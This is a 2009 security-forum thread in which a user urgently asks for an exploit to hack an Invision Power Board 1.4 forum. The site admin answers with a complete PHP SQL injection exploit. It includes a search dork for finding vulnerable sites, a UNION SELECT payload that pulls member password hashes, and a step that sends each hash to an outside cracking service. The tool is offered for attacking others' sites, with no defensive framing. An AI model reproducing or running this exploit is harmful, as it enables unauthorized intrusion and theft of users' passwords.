Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 65
Members: 0
Total: 65
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
Post new topicReply to topic View previous topic :: View next topic
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
PostPosted: Thu Mar 19, 2009 11:17 am Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




I really need an Exploit for Invision Power Board 1.4, Please I really need it, very urgently.
Also, if you have any exploit that works on that system, please give it to me.

Thanks.
View user's profile Send private message
plzplzplz
PostPosted: Thu Mar 19, 2009 2:46 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




*up*
plz plz help!
i really need this!!!!
View user's profile Send private message
PostPosted: Thu Mar 19, 2009 3:16 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is something I found for IPB 1.4, maybe works, maybe not ... just try it ...

Code:

<?php
//----------------------------------------------------------------------------------------------------//
// Invision Power Board Calendar SQL Injection Exploit
// Found by WaReZ
// Dork : "Powered by Invision Power Board (U) v1.4 Final 2005 IPS"
//----------------------------------------------------------------------------------------------------//
// Coded by Pr0T3cT10n < Pr0T3cT10n@Gmail.Com >
// KamikaZ-Team
// ISRAEL
//----------------------------------------------------------------------------------------------------//
set_time_limit(0);
ignore_user_abort(0);
function pull_out_md5($site, $path, $id)
{
echo('<div align="left" class="text">Exploiting..<br />');
$contents = file_get_contents('http://www.' .$site.$path. 'index.php?act=calendar&m=3&y=2008+AND+1=0+UNION+SELECT+1,id,2008,3,1,password,password,0x2A,password,password,password,password,password,password,password,password,password,password,password,password,password+FROM+ibf_members+where+id+=+' .$id. '+UNION+SELECT+*+FROM+ibf_calendar_events+WHERE+1=1');
if(preg_match("/eventid\=1\'\>([a-z0-9]+)\</", $contents, $matches))
{
echo('Found hash(' .$matches[1]. ')!<br />Try to crack it..<br />');
$md5_search = file_get_contents('http://gdataonline.com/qkhash.php?mode=txt&hash=' .$matches[1]);
if(preg_match("/<td width=\"35%\"><b>(.*)<\/b><\/td>/", $md5_search, $results))
echo('OK, <b>Cracked</b>(<b>' .$matches[1]. ' = ' .$results[1]. '</b>)<br />');
else
{
echo('Failed.<br />');
echo('Hash: ' .$matches[1]);
}
}
echo('</div>');
}
?>
<html dir="ltr">
<head>
<title>Invision Power Board Calendar SQL Injection Exploit</title>
<style>
* { background-color: #000000; font-family: Verdana; color: #999999; }
.text { font-size: 12px; }
a:link, a:visited, a:active { color: #e3e2e2; text-decoration: none; font-size: 11px;}
a:hover { color: #1774ba; font-size: 11px; }
input, textarea, select { background-color: black; color: #a6a6a6; border: solid 1px #363636; }
input:hover, textarea:hover { border-color: #D0D0D0; }
input:focus, textarea:focus { border-color: #F0E80A; color: #FFFFFF; }
</style>
</head>
<body>
<div align="left"><h2><u>Invision Power Board Calendar SQL Injection Exploit</u></h2></div>
<?php
if($_POST['site'] && $_POST['path'] && $_POST['id'] && $_POST['submit'])
pull_out_md5($_POST['site'], $_POST['path'], $_POST['id']);
else
echo('<div align="left"><form method="POST" action="?"><table class="text"><tr><td>Site:</td><td><input type="text" name="site"></td></tr><tr><td>Path:</td><td><input type="text" name="path"></td></tr><tr><td>User ID:</td><td><input type="text" name="id"></td></tr><tr><td><input type="submit" name="submit" value="Submit"></td></tr></table></form></div>');
?>
</body>
</html>
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Mar 19, 2009 6:13 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




thank you man!
View user's profile Send private message
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds